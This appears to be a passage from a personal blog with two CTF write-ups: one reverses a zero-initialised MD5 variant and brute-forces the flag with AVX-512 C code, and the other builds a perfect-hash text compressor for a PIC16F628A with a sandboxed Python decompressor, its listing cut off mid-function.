A[5] = A[125] + A[0]
A[0] = A[5] | A[8]
A[5] = A[126] + A[1]
A[1] = A[5] | A[8]
A[5] = A[127] + A[2]
A[2] = A[5] | A[8]
A[5] = A[128] + A[3]
A[3] = A[5] | A[8]

Failing with z3

The last thing to do now was to pass everything into z3, and boom get the flag… right? Well, it turned out not to be that simple. I had z3 running for a half an hour but still no output, so what was going on?

I went back to the Ghidra decompilation for any clues to make it go faster. Apparently, I had missed something; a reference to __ctype_b_loc() in the code. __ctype_b_loc() is a libc function that is used in the implementations of certain C functions like isalpha() and isdigit(). More specifically, it returns a const unsigned short int* ctype_b_values[] where each entry contains a 16-bit bitmask in which the nth bit encodes the return value of one of the is*****() functions.

Where is this used, you may ask? After the long stream of if statements, the program iterates through each byte of the flag (inside corctf{...}), and terminates the loop early if (ctype_b_values[flag[i]] & 8) == 0. The 3rd bit corresponds to isalnum(), and a set bit means that the byte is alphanumeric. Therefore, the flag has to be alphanumeric.

I applied this new constraint to z3 hoping it would output a solution this time, but was gutted to find that it still, would not budge.

However, this presents some new useful information; the brute force calculation is not 69,833,729,609,375, but 50*62^6 = 2,840,011,779,200. That’s nearly a 25x improvement, but still no easy task. Even if each of the 865 instructions I would have to execute accounted for one clock cycle, it would still take 2,840,011,779,200 * 865 / (2*10^9) / 60 / 60 ~ 341 hours on a typical 2 GHz computer.

At this point we had 14 hours left to the CTF, and it was also 3AM so I wanted to go to sleep. As one final effort for the night, I Googled one of the mysterious hexadecimal constants in the code to see if anything would pop up.

I wasn’t expecting any results, until I started seeing MD5 pop up! Could it be that this entire program was implementing MD5? Indeed after testing the program with different inputs, it was in fact MD5, but not entirely. Normally, the MD5 state is initialized to 0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476, but in the program these are all set to zero. Let’s just call this variant MD5-0.

In any case, I went to sleep with this knowledge hoping to crack this the next day.

The next day

(I woke up ~~bright and early~~ at 11AM the next morning)

Since no preimage attack on MD5 is known, the only option was to brute force MD5-0 over 2,840,011,779,200 possibilities, where the correct flag should produce a suffix of 19c603ba14353ce4.

To test the feasibility of the brute force, I grabbed an online C implementation of MD5 and measured its speed. The baseline single-threaded performance on my machine reached around 8*10^6 hashes per second. While this seemed relatively fast to me, the actual running time on 4 cores would be a daunting 2,840,011,779,200 / (8*10^6) / 60 / 60 / 4 ~ 25 hours.

Optimizing the program by making use of the fact that the flag was always 11 bytes long and unrolling all of the loops, I was still only able to reach 1.3*10^7 hashes per second, or 15 hours. Still not nearly fast enough!

Vectorization is OP

A common “cheat” to magically increase a program’s speed is by using x86 SIMD instructions to perform vectorized operations on more than 64 bits at a time. Luckily, my computer supported AVX-512, an instruction set that allows performing 16 32-bit operations in parallel.

I wrote a new MD5 implementation from scratch utilizing these instructions called md5_avx512, which could hash 16 11-byte strings. I was expecting maybe a 4-8x speedup, but it ended up being able to computer hashes 16x faster, which is the theoretical optimum! This brought the estimated time to just under an hour, which might just be fast enough.

By the time I finished writing the program, we only had one hour left on the clock. Regardless, I ran the program and waited for a miracle. Unfortunately, it took longer than expected, as it had only reached halfway done with only 10 minutes left on the clock. I held out for a clutch victory, but it did not come.

Two stupid bugs

After the CTF concluded I kept my program running, but it actually finished without finding any solution! To my (annoyed) disbelief, I ended up making two stupid bugs. One of which was using the flipped endianness for the target suffix, and the other was applying #pragma omp parallel for without realizing that it was overwriting variables between threads!

After fixing these bugs, I was at last able to run the multi-threaded, AVX-512 optimized MD5-0 brute forcer without any issues:

// gcc -O3 -march=native -o brute brute.c && ./brute

#include 
#include 
#include 
#include 
#include 

#define AVX512_F 0xca
#define AVX512_G 0xe4
#define AVX512_H 0x96
#define AVX512_I 0x39

#define AVX512_STEP(f, a, b, c, d, r, k) { \
    (a) = _mm512_add_epi32((a), _mm512_add_epi32(_mm512_ternarylogic_epi32((b), (c), (d), (f)), (k))); \
    (a) = _mm512_add_epi32(_mm512_rol_epi32((a), (r)), (b)); \
}

#define T0 0xba03c619
#define T1 0xe43c3514

static uint32_t md5_avx512(__m512i x0, __m512i x1, __m512i x2) {
    __m512i a = _mm512_setzero_si512();
    __m512i b = _mm512_setzero_si512();
    __m512i c = _mm512_setzero_si512();
    __m512i d = _mm512_setzero_si512();

    // Round 1
    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_add_epi32(x0, _mm512_set1_epi32(0xd76aa478)));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_add_epi32(x1, _mm512_set1_epi32(0xe8c7b756)));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_add_epi32(x2, _mm512_set1_epi32(0x242070db)));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xc1bdceee));

    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0xf57c0faf));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x4787c62a));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa8304613));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0xfd469501));

    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x698098d8));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0x8b44f7af));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xffff5bb1));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x895cd7be));

    AVX512_STEP(AVX512_F, a, b, c, d, 7, _mm512_set1_epi32(0x6b901122));
    AVX512_STEP(AVX512_F, d, a, b, c, 12, _mm512_set1_epi32(0xfd987193));
    AVX512_STEP(AVX512_F, c, d, a, b, 17, _mm512_set1_epi32(0xa67943e6));
    AVX512_STEP(AVX512_F, b, c, d, a, 22, _mm512_set1_epi32(0x49b40821));

    // Round 2
    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_add_epi32(x1, _mm512_set1_epi32(0xf61e2562)));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc040b340));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x265e5a51));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_add_epi32(x0, _mm512_set1_epi32(0xe9b6c7aa)));

    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xd62f105d));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0x02441453));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xd8a1e681));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0xe7d3fbc8));

    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0x21e1cde6));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_set1_epi32(0xc337082e));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0xf4d50d87));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x455a14ed));

    AVX512_STEP(AVX512_G, a, b, c, d, 5, _mm512_set1_epi32(0xa9e3e905));
    AVX512_STEP(AVX512_G, d, a, b, c, 9, _mm512_add_epi32(x2, _mm512_set1_epi32(0xfcefa3f8)));
    AVX512_STEP(AVX512_G, c, d, a, b, 14, _mm512_set1_epi32(0x676f02d9));
    AVX512_STEP(AVX512_G, b, c, d, a, 20, _mm512_set1_epi32(0x8d2a4c8a));

    // Round 3
    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xfffa3942));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x8771f681));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x6d9d6122));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xfde53864));

    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_add_epi32(x1, _mm512_set1_epi32(0xa4beea44)));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0x4bdecfa9));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xf6bb4b60));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0xbebfbc70));

    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0x289b7ec6));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_add_epi32(x0, _mm512_set1_epi32(0xeaa127fa)));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0xd4ef3085));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_set1_epi32(0x04881d05));

    AVX512_STEP(AVX512_H, a, b, c, d, 4, _mm512_set1_epi32(0xd9d4d039));
    AVX512_STEP(AVX512_H, d, a, b, c, 11, _mm512_set1_epi32(0xe6db99e5));
    AVX512_STEP(AVX512_H, c, d, a, b, 16, _mm512_set1_epi32(0x1fa27cf8));
    AVX512_STEP(AVX512_H, b, c, d, a, 23, _mm512_add_epi32(x2, _mm512_set1_epi32(0xc4ac5665)));

    // Round 4
    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_add_epi32(x0, _mm512_set1_epi32(0xf4292244)));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x432aff97));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xab9423ff));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xfc93a039));

    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x655b59c3));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0x8f0ccc92));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xffeff47d));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_add_epi32(x1, _mm512_set1_epi32(0x85845dd1)));

    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0x6fa87e4f));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xfe2ce6e0));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_set1_epi32(0xa3014314));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0x4e0811a1));

    AVX512_STEP(AVX512_I, a, b, c, d, 6, _mm512_set1_epi32(0xf7537e82));
    AVX512_STEP(AVX512_I, d, a, b, c, 10, _mm512_set1_epi32(0xbd3af235));
    AVX512_STEP(AVX512_I, c, d, a, b, 15, _mm512_add_epi32(x2, _mm512_set1_epi32(0x2ad7d2bb)));
    AVX512_STEP(AVX512_I, b, c, d, a, 21, _mm512_set1_epi32(0xeb86d391));

    __mmask16 eq_c = _mm512_cmpeq_epi32_mask(c, _mm512_set1_epi32(T0));
    __mmask16 eq_d = _mm512_cmpeq_epi32_mask(d, _mm512_set1_epi32(T1));
    __mmask16 eq = eq_c & eq_d;

    if (eq) {
        __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16];
        _mm512_store_si512(_x0, x0);
        _mm512_store_si512(_x1, x1);
        _mm512_store_si512(_x2, x2);

        for (int i = 0; i < 16; i++)
            if ((eq >> i) & 1)
                printf("found: %.4s%.4s%.4s\n", (uint8_t *)&_x0[i], (uint8_t *)&_x1[i], (uint8_t *)&_x2[i]);
    }
}

#define A 62
#define NTHREADS 8

const char ALPHABET[64] = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz00";
const char ALPHABET_S4[50] = "012345ABCDEFGHIJKLMNOPQRSTUVabcdefghijklmnopqrstuv";

static void *search(void *arg) {
    __attribute__((aligned(64))) uint32_t _x0[16], _x1[16], _x2[16];

    int n = (uint64_t)arg;

    int start = n * (50 / NTHREADS);
    int end = n != NTHREADS - 1 ? (n + 1) * (50 / NTHREADS) : 50;

    printf("starting search [%d, %d)\n", start, end);

    uint8_t flag[12] = { 0 };
    flag[11] = 0x80;

    const __m512i Y0 = _mm512_setr_epi32(48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 65, 66, 67, 68, 69, 70);
    const __m512i Y1 = _mm512_setr_epi32(71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86);
    const __m512i Y2 = _mm512_setr_epi32(87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108);
    const __m512i Y3 = _mm512_setr_epi32(109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 48, 48);

    for (int c0 = start; c0 < end; c0++) {
        flag[9] = ALPHABET_S4[c0];
        flag[0] = ALPHABET_S4[c0] + 1;
        flag[7] = ALPHABET_S4[c0] + 4;
        for (int c1 = 0; c1 < A; c1++) {
            flag[1] = flag[10] = ALPHABET[c1];
            for (int c2 = 0; c2 < A; c2++) {
                flag[2] = flag[4] = ALPHABET[c2];
                for (int c3 = 0; c3 < A; c3++) {
                    flag[3] = ALPHABET[c3];
                    for (int c4 = 0; c4 < A; c4++) {
                        flag[5] = ALPHABET[c4];
                        for (int c5 = 0; c5 < A; c5++) {
                            flag[6] = ALPHABET[c5];

                            uint32_t *flag_u32 = (uint32_t *)flag;
                            for (int i = 0; i < 16; i++) {
                                _x0[i] = flag_u32[0];
                                _x1[i] = flag_u32[1];
                                _x2[i] = flag_u32[2];
                            }

                            __m512i x0 = _mm512_load_si512(_x0);
                            __m512i x1 = _mm512_load_si512(_x1);
                            __m512i x2 = _mm512_load_si512(_x2);

                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y0));
                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y1));
                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y2));
                            md5_avx512(x0, x1, _mm512_or_si512(x2, Y3));
                        }
                    }
                }
            }
        }
        printf("checkpoint: %d (thread %d)\n", c0, n);
    }
}

int main() {
    pthread_t threads[NTHREADS];
    for (uint64_t i = 0; i < NTHREADS; i++)
        pthread_create(&threads[i], NULL, search, (void *)i);
    for (uint64_t i = 0; i < NTHREADS; i++)
        pthread_join(threads[i], NULL);
    return 0;
}

1hr 20mins later, it found the flag: corctf{cPv3v8VfWbP}. The full flag emerges when it is submitted to digestme:

$ ./digestme
Welcome!
Please enter the flag here:
corctf{cPv3v8VfWbP}
Nice!

Full flag: corctf{youtu.be/dQw4w9WgXcQ}

Final thoughts

Despite being so close to solving it in the end – and also costing us 6th place, I enjoyed every part of the challenge, from converting the disassembly into bitwise operations and then 32-bit integer arithmetic, to realizing it was MD5 all along, and even writing the bruteforcer that I somehow messed up.

I do believe the challenge would have been better off with a smaller search space, because some people (like me) don’t have strong CPUs or GPUs. On the other hand, I think performance optimization is fun, especially when SIMD is involved.

[UIUCTF 2024] Picoify (500)

2024-07-01T00:00:00+00:00

Problem Description

Picoify is a “king-of-the-hill” style challenge in which we’re tasked with implementing a compression algorithm and corresponding decompressor under fairly severe restrictions. Better compression results in a better score.

Specifically, the task is to write a compression algorithm for the Microchip PIC16F628A, a small 8-bit microprocessor with 2048 words of program memory (i.e. space for 2048 instructions), and 224 bytes of RAM. The decompressor is written in Python, but is run in a strict seccomp sandbox with tight memory and CPU limits.

The input text is 2048 bytes long, drawn randomly from a list of 8192 uppercase words, with certain letters (ABEGIOSTZ) randomly replaced by 1337-speak equivalents (50% probability). Here’s an example input:

RE4LLY RUG C1TI35 633K R35P1RA7ORY GUARD COL0URS P4PER PRO7EC73D SQU4R3 C0M81NE P0RC3L41N L0 NI 7ASKS CER4MIC YO6A 7ERM1NA7I0N C0N50L3S 3F N0RT0N F1RM N3C HELP5 R1M UM 7R166ER MURPHY H3LP SENS0R EXTR4ORDINARY 5UPER M0R0CC0 B0T5WANA C0NN3C710N M3NT10N WO0D5 E4R AUTHEN71C 6OV3RNM3N74L CHRI5 S33KER LIN6ER1E PR0DUC71ON 3XPLORER F4C3 FLO0D DECAD3 AN4LYSES AV6 4GE5 4U5 P455AGE D 8R42IL14N 8RIN61N6 63OR614 TUR80 B3LG1UM CSS ARMED 0U7COM3 U5IN6 8UDDY AU7OM471ON R35ULT3D JACKET 6R CHR0NIC BESIDES L4ND M0V135 PREP4RE F15HIN6 N1CK SCH3ME ALPINE MUL7I 5UPPL3M[…]

The input is truncated to fit 2048 bytes, so the final word may be cut off.

The score of any submission is the number of bytes saved, and you need to compress by at least 25% to get a flag at all. Thus, the minimum score to get a flag is 512 (2048 * 1/4).

We’re provided with a starter PIC assembly file that just echoes the input back to the output, as well as a Dockerfile for running the scoring system locally.

Analysis

There are only 36 unique characters, so one very simple approach is to output 6 bits per byte; this would be sufficient to score 512 and get a flag (output is 2048*6/8 = 1536 bytes exactly). We can get more clever using entropy encoding, using a variable number of bits per character; the Huffman algorithm is a common approach. We can use a quick script to calculate the average entropy of the texts and estimate the score of such an approach:

from collections import Counter
import math
c = Counter()
samples = []
for i in range(100):
    data = generate_data()
    samples.append(data)
    c.update(data)

total = len(samples) * 2048
entropy = sum((v / total) * -math.log2(v / total) for v in c.values())

This produces an entropy of 4.67 bits per character, meaning that we should be able to score around 852 with a Huffman-based approach (2048*4.67/8 ≈ 1196). From the challenge scoreboard provided by the organizers, it seems most successful teams took this approach.

While I considered these approaches, I figured it should be possible to score much higher given the constrained nature of the input text: there are only 8192 words (13 bits of entropy per word), and a few bits of extra entropy per word to account for the random 1337-speak letters (1 bit of entropy per 1337-speakable letter). Running a quick simulation, if we’re able to actually encode each word using exactly 13 bits (plus 1337-speak bits), we could score an average of 1485 (average output size is 562.8 bytes):

import re, statistics
comp_bits = [len(t.split()) * 13 + len(re.findall(b"[ABEGIOSTZ483610572]", t)) for t in samples]
print(statistics.mean(comp_bits) / 8)

This sets a rough upper bound on the performance of any compression algorithm - it measures the amount of entropy used to generate the output in the first place.

The Compressor

For encoding words using a minimum number of bits, we can use perfect hashing. A perfect hash function is one which maps every input in a finite set to a unique numerical value with no collisions. If we can find a perfect hash function for our wordlist, we could compress by outputting the hash values for each word; as there are no collisions, the decompressor could uniquely map these back to the original words.

Luckily, the GNU gperf command is designed specifically for this purpose. It is normally used to derive perfect hash functions for sets of keywords (e.g. for parsing a programming language). We can just feed gperf our entire wordlist: head -n 8192 words.txt | tr a-z A-Z | gperf -n -m=10 -k '1-11,$' -7 > gperf.c.

gperf outputs C code which implements the perfect hash function:

static unsigned int
hash (str, len)
     register const char *str;
     register unsigned int len;
{
  static unsigned int asso_values[] =
    {
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124,    145,  22134,  14665,   7025,     20,
       43498,   6070,   2551,     60,  13988,  38948,   1820,  30148,     15,     85,
        6351,   5350,     25,      5,     65,    555,  14565,   2027,    295,    735,
       45643,  29266,   7705,  42888,  10966,     21,   4875,    325,   4725,  53578,
       57958,  14261,   1220,  29394,  60128,  26679,  45243,    275,   2250,   1350,
       23954,    585,    430,     90,  35098,  11101,  49537,    401,  51258,      1,
       64213,  10636,   4410,   1945,  10338,   2786,  42248,  14110,   9063,  51277,
           5,   1385,    330, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124,
      206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124, 206124
    };
  register unsigned int hval = 0;

  switch (len)
    {
      default:
        hval += asso_values[(unsigned char)str[10]];
      /*FALLTHROUGH*/
      case 10:
        hval += asso_values[(unsigned char)str[9]];
      /*FALLTHROUGH*/
      case 9:
        hval += asso_values[(unsigned char)str[8]];
      /*FALLTHROUGH*/
      case 8:
        hval += asso_values[(unsigned char)str[7]];
      /*FALLTHROUGH*/
      case 7:
        hval += asso_values[(unsigned char)str[6]];
      /*FALLTHROUGH*/
      case 6:
        hval += asso_values[(unsigned char)str[5]+3];
      /*FALLTHROUGH*/
      case 5:
        hval += asso_values[(unsigned char)str[4]+19];
      /*FALLTHROUGH*/
      case 4:
        hval += asso_values[(unsigned char)str[3]+13];
      /*FALLTHROUGH*/
      case 3:
        hval += asso_values[(unsigned char)str[2]+29];
      /*FALLTHROUGH*/
      case 2:
        hval += asso_values[(unsigned char)str[1]];
      /*FALLTHROUGH*/
      case 1:
        hval += asso_values[(unsigned char)str[0]+42];
        break;
    }
  return hval + asso_values[(unsigned char)str[len - 1]];
}

Over our wordlist, the maximum hash value is 206123, which can be comfortably encoded in 18 bits (2¹⁸ = 262144). Simulating this, we find that this should compress to around 734 bytes per message on average, giving a score of 1314 - far better than the Huffman approach!

Instead of writing this in PIC assembly, I chose to use Microchip’s XC8 C compiler. I converted the provided startup code to C in order to get the UART to work. Since we’re working with a very small amount of memory, I chose the smallest possible data types to save space, making use of Microchip’s special uint24_t 3-byte integer type to save even more space.

The implementation itself is relatively straightforward: we accumulate the hash and “1337 bits” as each plaintext character comes in, then flush the hash and any accumulated 1337 bits when we see a space character. When we reach 2028 total input characters, we switch to encoding the remaining characters directly to avoid problems with any final truncated word (as the longest word in the wordlist is 18 characters).

Here’s what the PIC code looks like. This is compiled with xc8-cc -mcpu=pic16f628a -O2:

#include 
#include 

// disable the watchdog timer
#pragma config WDTE = OFF

static uint8_t txbuf[8];
static uint8_t txcnt = 0;

static void send_byte(uint8_t b) {
    txbuf[txcnt] = b;
    txcnt++;
}

static uint16_t total_rx_count = 0;
static uint8_t is_tail = 0;

static uint8_t word_len = 0;
static uint8_t last_char = 0;
static uint24_t cur_hash = 0;
static uint24_t leet_bits = 0;
static uint8_t leet_count = 0;

// compressed form of the gprof table, removing unreachable entries
static const uint16_t asso_values[] = {145, 22134, 14665, 7025, 20, 43498, 6070, 2551, 60, 13988, 38948, 1820, 30148, 15, 85, 6351, 5350, 25, 5, 65, 555, 14565, 2027, 295, 735, 45643, 29266, 7705, 42888, 10966, 21, 4875, 325, 4725, 53578, 57958, 14261, 1220, 29394, 60128, 26679, 45243, 275, 2250, 1350, 23954, 585, 430, 90, 35098, 11101, 49537, 401, 51258, 1, 64213, 10636, 4410, 1945, 10338, 2786, 42248, 14110, 9063, 51277, 5, 1385, 330};
// offsets applied to each character to get the asso_values index
static const int8_t asso_offs[] = {-23, -65, -36, -52, -46, -62, -65, -65, -65, -65, -65};
// offset applied to the final character
#define asso_final_off (-65)
static const uint8_t leet_map[] = { 'O', 'I', 'Z', 'E', 'A', 'S', 'G', 'T', 'B' };

static uint8_t cur_byte = 0;
static uint8_t cur_bit = 0;

static void push_bits(uint24_t x, uint8_t nbits) {
    while(nbits) {
        uint8_t cur = nbits;
        if(cur > (8 - cur_bit)) {
            cur = 8 - cur_bit;
        }
        cur_byte |= ((uint8_t)x) << cur_bit;
        cur_bit += cur;
        nbits -= cur;
        x >>= cur;
        if(cur_bit == 8) {
            send_byte(cur_byte);
            cur_byte = 0;
            cur_bit = 0;
        }
    }
}

static void process_char(uint8_t c) {
    total_rx_count++;
    if(is_tail) {
        // this could be more efficient (e.g. 6 bit or entropy encoding)
        // but we're only using it for at most 20 input characters
        push_bits(c, 8);
        if(total_rx_count == 2048) {
            push_bits(0, 8);
        }
        return;
    }

    if(c == ' ') {
        if(total_rx_count >= 2028) {
            is_tail = 1;
        }
        cur_hash += asso_values[last_char + asso_final_off];
        push_bits(cur_hash, 18);
        if(leet_count)
            push_bits(leet_bits, leet_count);

        word_len = 0;
        last_char = 0;
        cur_hash = 0;
        leet_bits = 0;
        leet_count = 0;
        return;
    }

    /* regular word character */
    if(c >= '0' && c <= '8') {
        c = leet_map[c - '0'];
        leet_bits |= (1 << leet_count);
        leet_count++;
    } else if(c == 'A' || c == 'B' || c == 'E' || c == 'G' || c == 'I' || c == 'O' || c == 'S' || c == 'T' || c == 'Z') {
        leet_count++;
    }

    if(word_len <= 10) {
        cur_hash += asso_values[c + asso_offs[word_len]];
    }
    word_len++;
    last_char = c;
}

void __interrupt() main_irq() {
    if(PIR1bits.RCIF) {
        /* rx interrupt */
        uint8_t c = RCREG;
        PIR1bits.RCIF = 0;
        process_char(c);
    }
}

int main() {
    // globally enable interrupts
    INTCONbits.GIE = 1;
    INTCONbits.PEIE = 1;

    // configure uart and transmitter
    TRISB = 0x06;
    SPBRG = 32;
    TXSTAbits.SYNC = 0;
    RCSTAbits.SPEN = 1;
    TXSTAbits.TXEN = 1;

    // configure uart receiver
    PIE1bits.RCIE = 1;
    RCSTAbits.CREN = 1;

    while(1) {
        while(!TXSTAbits.TRMT)
            ;
        while(!txcnt)
            ;
        TXREG = txbuf[0];
        txcnt--;
        for(uint8_t i=0; i<txcnt; i++)
            txbuf[i] = txbuf[i+1];
    }
}

One feature to note is that we buffer and send bytes asynchronously, because we only send bytes upon receiving a space character and may output several bytes at once (up to 36 bits).

This is a very space-efficient compressor, using only 583 words of program memory (28.5%) and 51 bytes of RAM (22.8%). Here’s a sample compressed output corresponding to the sample input above (748 bytes); note that it’s a bit larger than predicted because we encode up to 21 bytes of trailing characters rather inefficiently:

3877984a12693cb20b2b77c7e762860280bc84ef44aafde858752c9dce39bcf0e4c86cdac74d2bb1468988d1118c63d550165e8755454caa104b7b8e6adb991d4f351549d3ac77f4136f6c9b6740bf11081d258a21e8e1e9280125fd5e107a631df314e0b723b8d29e9ee609fb4330c066542f71b70742ee2a38610a6d0521291c8282269d7cc878028eece218c883bc987b1bad6e3dccbec98b3df8527f03e0aa0626385607af26b3b0230adde31e7bf90d180128a94a5d550035fa4cf5e4c99b910b1a7b76da874ca41a05fa132943a7d7df507b9e31f3330a736380750302a597a3f8dcd22dbeeb331b8c80e590ff202e374c51d960bb020b2d9895037c08704f8068216c472f50888de8d384064640847124da1fb78aa83c41384a1ab168e7e220e1dea20032b1c0ed148d4050d1563c6e618dcb8c1fe4ec9bebfb7e484b93a4b5aaa50b643e58e1e1989c0092117dface8aa2913720d31f2bc944bc4da22882cf2de3b3c5e0bd1a968da0447900dfc1a1e11ea9787c13506072a312abee9546b50927af86101c99f81b2f22d8012dacba093281ade5d0e18ea16f52cbaa87a7423e116986995222993c91c927cf50a542e2f2c01d45977e90bd3548e10156bcf4d2b9a8f69a346227c58bdc0e878c98e75066a6e221cd9f3118b8d3f7369c8857a4b5c9d1cc41de79962495c579092c101432cf81991cd2a1c36169172a701844c242c7f9fc6d6cb153e4221249026db5e09da72ecf0417c911292a94910cae855da54a0a14cab2353eb7b90a242f464551806b44be1723379c244f9a683e6e440823c73be876a83e7f2d13e506c06e4b870243081217c1c128b4cf3452fcf52131371a914301de7fa329bfaa22b77def64523e3ae0012e0e4a772697c785d9a4d2166dcc04d95bdc9800f2ccc1732e5a9d31c39e80a622882bc0de58690e38ac9b2600b49891e724688c749484aaa6ff67d8e9c81097bdf4fb1ceb132f979476d6480cdbc3b07edd2501291772370a1e4e3c731f8d571972c9448992ac629c66409c9ea890629c8e00

The Decompressor

When I first devised this algorithm, I didn’t really think about the decompressor much; I figured it would be easy to implement since we get to write Python code. Little did I know this would end up being the hardest part of the challenge.

The decompression code is run using a small stub called decomp_runner.py, which looks like this:

#!/usr/bin/env python3

import sys
from base64 import b64decode
import resource
import pyseccomp


def run(prog, data, out):
    exec(prog, {'data': data, 'out': out})


def sandbox():
    resource.setrlimit(resource.RLIMIT_CPU, (1, 1))
    resource.setrlimit(resource.RLIMIT_FSIZE, (4096, 4096))
    resource.setrlimit(resource.RLIMIT_AS, (1 << 21, 1 << 21))
    resource.setrlimit(resource.RLIMIT_DATA, (1 << 21, 1 << 21))

    filter = pyseccomp.SyscallFilter(pyseccomp.ERRNO(pyseccomp.errno.EPERM))
    filter.add_rule(pyseccomp.ALLOW, 'write', pyseccomp.Arg(0, pyseccomp.EQ, sys.stdout.fileno()))
    filter.add_rule(pyseccomp.ALLOW, 'exit_group')
    filter.add_rule(pyseccomp.ALLOW, 'brk')
    filter.load()


def main():
    assert len(sys.argv) == 3

    prog = b64decode(sys.argv[1]).decode('ascii')
    data = b64decode(sys.argv[2])
    out = bytearray([0]*4096)

    sandbox()
    run(prog, data, out)


if __name__ == '__main__':
    main()

Our decompressor code is passed as a base64 blob on the command-line, together with the compressor’s output. It installs tight CPU and memory limits (1 second CPU time, 2 MB memory size), then loads a very restrictive seccomp syscall filter which allows only write(STDOUT_FILENO, ...), exit_group and brk. Finally, the provided code is launched with exec.

My first decoder attempt looked like this:

wordmap = {
11: "MS",
31: "MN",
41: "ME",
51: "MR",
100: "GS",
121: "MI",
# [snip] #
194085: "OLYMPIC",
195863: "NIGHTLIFE",
203640: "HOMEWORK",
205457: "NETWORK",
206123: "BRUNSWICK",
}

leet_table = {
    'A': '4',
    'B': '8',
    'E': '3',
    'G': '6',
    'I': '1',
    'O': '0',
    'S': '5',
    'T': '7',
    'Z': '2'
}

cur_byte = 0
cur_bit = 0

def readbits(n):
    global cur_bit, cur_byte
    res = 0
    resbits = 0
    while resbits < n:
        chunk = n - resbits
        if chunk > 8 - cur_bit:
            chunk = 8 - cur_bit
        t = (data[cur_byte] >> cur_bit) & ((1 << chunk) - 1)
        res |= t << resbits
        resbits += chunk
        cur_bit += chunk
        if cur_bit == 8:
            cur_bit = 0
